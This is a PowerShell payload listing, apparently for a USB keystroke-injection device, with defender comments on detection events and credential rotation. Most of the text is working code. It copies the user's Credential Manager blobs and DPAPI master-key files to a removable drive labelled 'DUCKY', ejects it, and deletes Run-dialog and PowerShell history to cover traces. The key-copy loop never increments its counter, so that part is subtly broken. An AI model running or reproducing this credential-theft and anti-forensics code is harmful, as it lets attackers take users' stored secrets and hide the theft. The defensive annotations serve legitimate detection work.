# PowerShell payload listing (restored to one statement per line).
# What it does, in order: locates a volume labelled 'DUCKY', copies the current
# user's DPAPI credential blobs and everything under the DPAPI "Protect" folder
# to that volume, ejects the volume, then deletes Run-dialog history and the
# PSReadLine history file.
#
# Defender notes:
#   - Everything runs in the logged-on user's context; no elevation is requested.
#   - The cleanup at the end touches only RunMRU and the PSReadLine history file.
#     PowerShell Script Block Logging (event 4104), process-creation auditing
#     (event 4688 / Sysmon event 1) and removable-device auditing are untouched
#     by this script, so those remain the primary evidence sources.
#   - If this is found to have run, treat secrets held in the user's Windows
#     Credential Manager as exposed and rotate them.

# Variables
# Resolves the drive letter of the volume whose filesystem label is 'DUCKY'.
# Detection: a Get-Volume lookup by label followed by writes to that letter.
$drive = (Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
$userProfile = $Env:UserProfile

# Get the credential files
# -Force is needed because these files carry hidden/system attributes.
# Detection: a process other than lsass.exe enumerating or reading
# %LOCALAPPDATA%\Microsoft\Credentials (object-access auditing, event 4663,
# requires a SACL on the folder).
$credentialFiles = Get-ChildItem -Force "${userProfile}\AppData\Local\Microsoft\Credentials\"
$i=1
$credentialFiles | ForEach-Object {
    $fileObj = $_
    # copy to ducky: each blob is written to the removable volume as credential<N>
    Copy-Item $fileObj.FullName "${drive}:\credential${i}"
    $i++
}

# Get the gUIDMasterKey
# Collects the full paths of the sub-directories of %APPDATA%\Microsoft\Protect
# (normally one folder per user SID, holding the DPAPI master-key files).
$protectFolder = (Get-ChildItem -Directory -Force "${userProfile}\AppData\Roaming\Microsoft\Protect\").FullName

# Copy master key to ducky
# Recurses through the Protect sub-directories and copies each item found to the
# removable volume using the key${index} name.
# Detection: same as above, for reads under %APPDATA%\Microsoft\Protect.
$index=1
Get-ChildItem -Force -Recurse $protectFolder | ForEach-Object {
    # $fileName = $_.Name
    $filePath = $_.FullName
    Copy-Item $filePath "${drive}:\key${index}"
}

# Eject
# Shell.Application namespace 17 is the "My Computer" (drives) folder; the
# "Eject" verb is invoked on the drive item so the volume dismounts cleanly.
$driveEject = New-Object -ComObject Shell.Application
$driveEject.Namespace(17).ParseName("${drive}:").InvokeVerb("Eject")

# Cleanup traces
# Delete run box history
# /va removes every value under RunMRU, /f suppresses the confirmation prompt.
# Detection: reg.exe spawned by powershell.exe with a RunMRU delete on its
# command line; registry auditing on this key also records the deletion.
reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete Powershell history
# Removes the PSReadLine history file for the current user. A missing or
# freshly recreated history file on an actively used account is itself a signal.
Remove-Item (Get-PSreadlineOption).HistorySavePath
exit